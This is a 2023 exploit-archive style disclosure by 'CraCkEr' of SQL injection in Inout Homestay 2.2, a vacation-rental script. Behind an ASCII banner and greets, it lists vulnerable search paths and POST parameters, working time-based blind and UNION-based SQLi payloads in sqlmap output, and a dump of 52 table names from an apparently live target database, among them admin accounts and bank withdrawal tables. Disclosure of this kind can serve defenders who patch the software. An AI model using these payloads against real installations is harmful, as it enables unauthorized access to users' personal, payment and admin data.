┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ││ C r a C k E r ┌┘ ┌┘ T H E C R A C K O F E T E R N A L M I G H T ││ └───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ [ Vulnerability ] ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : Author : CraCkEr : │ Website : inoutscripts.com │ │ Vendor : Inout Scripts - Nesote Technologies Private Limited │ │ Software : Inout Homestay 2.2 │ │ Vuln Type: SQL Injection │ │ Impact : Database Access │ │ │ │────────────────────────────────────────────────────────────────────────────────────────│ │ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ : : │ Release Notes: │ │ ═════════════ │ │ │ │ SQL injection attacks can allow unauthorized access to sensitive data, modification of │ │ data and crash the application or make it unavailable, leading to lost revenue and │ │ damage to a company's reputation. │ │ │ ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/CryptozJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐ ┌┘ © CraCkEr 2023 ┌┘ └───────────────────────────────────────────────────────────────────────────────────────┘┘ Path: /index.php?page=search/searchdetailed broom=1[Inject-HERE]&bathr=1[Inject-HERE]&beds=1[Inject-HERE]&location=Indianapolis, IN, USA&address=Indianapolis, IN, USA&lat=39.768403&longi=-86.158068&indate=&outdate=&numguest=2[Inject-HERE]&property1=1&property2=7&property3=4&option=1&pstart=all&pend=948&page=1&type=2&type=2&userseachstate=Indiana&userseachcity=Indianapolis POST parameter 'broom' is vulnerable to SQLI POST parameter 'bathr' is vulnerable to SQLI POST parameter 'beds' is vulnerable to SQLI POST parameter 'numguest' is vulnerable to SQLI Path: /index.php?page=search/rentals location=Indianapolis%2C+IN%2C+USA&indate=&outdate=&address=Indianapolis%2C+IN%2C+USA&lat=39.768403&long=-86.158068&guests=2[Inject-HERE]&searchcity=Indianapolis&searchstate=Indiana POST parameter 'guests' is vulnerable to SQLI --- Parameter: broom (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: broom=1 AND (SELECT 4813 FROM (SELECT(SLEEP(5)))Pudr)&bathr=1&beds=1&location=Split, Croatia&address=21000, Split, Croatia&lat=43.5147118&longi=16.4435148&indate=&outdate=&numguest=2&property1=1,2,3&property2=7,8,9,10,14,15&property3=4,5,6&option=1,2&pstart=&pend=&page=1&type=2&type=2&userseachstate=Split-Dalmatia County&userseachcity=Split Type: UNION query Title: Generic UNION query (NULL) - 27 columns Payload: broom=1 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x716b787a71,0x564451596473794d69586f5a4677435270534b45566a6558734e4f5a72434279645855646f54456f,0x71786a6a71),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- -&bathr=1&beds=1&location=Split, Croatia&address=21000, Split, Croatia&lat=43.5147118&longi=16.4435148&indate=&outdate=&numguest=2&property1=1,2,3&property2=7,8,9,10,14,15&property3=4,5,6&option=1,2&pstart=&pend=&page=1&type=2&type=2&userseachstate=Split-Dalmatia County&userseachcity=Split --- [INFO] the back-end DBMS is MySQL back-end DBMS: MySQL >= 5.0.12 [INFO] fetching tables for database: '*****_homestay' Database: *****_homestay [52 tables] +----------------------------------+ | admin_account | | admin_payment_details | | category_property | | chat_details | | chat_messages | | checkout_ipn | | countries | | coupon_detail | | cron_details | | custom_field | | demo_message | | email_details | | email_templates | | forgetpassword | | host_rejected | | inout_ipns | | languages | | list_date_request | | list_images | | listing_date | | listing_detail | | listing_main | | message_notify_app | | messages | | msg_req_temp | | ppc_currency | | public_side_media_detail | | public_slide_images | | refund_creditupdate | | request_coupon_detail | | settings | | superhost_detail | | traveller_bank_deposit_history | | traveller_cancellation_modes | | traveller_cancelled | | user_account_detail | | user_address_verify_request | | user_details | | user_email_verification | | user_listing_request | | user_refunddetails | | user_registration | | user_reviews | | user_search_details | | user_settings | | user_wishlist_mapping | | user_withdrawal_details | | userabusereport | | userbank_pending_listing_request | | usercancellationsaction | | wish_list | | withdrawal_request | +----------------------------------+ [-] Done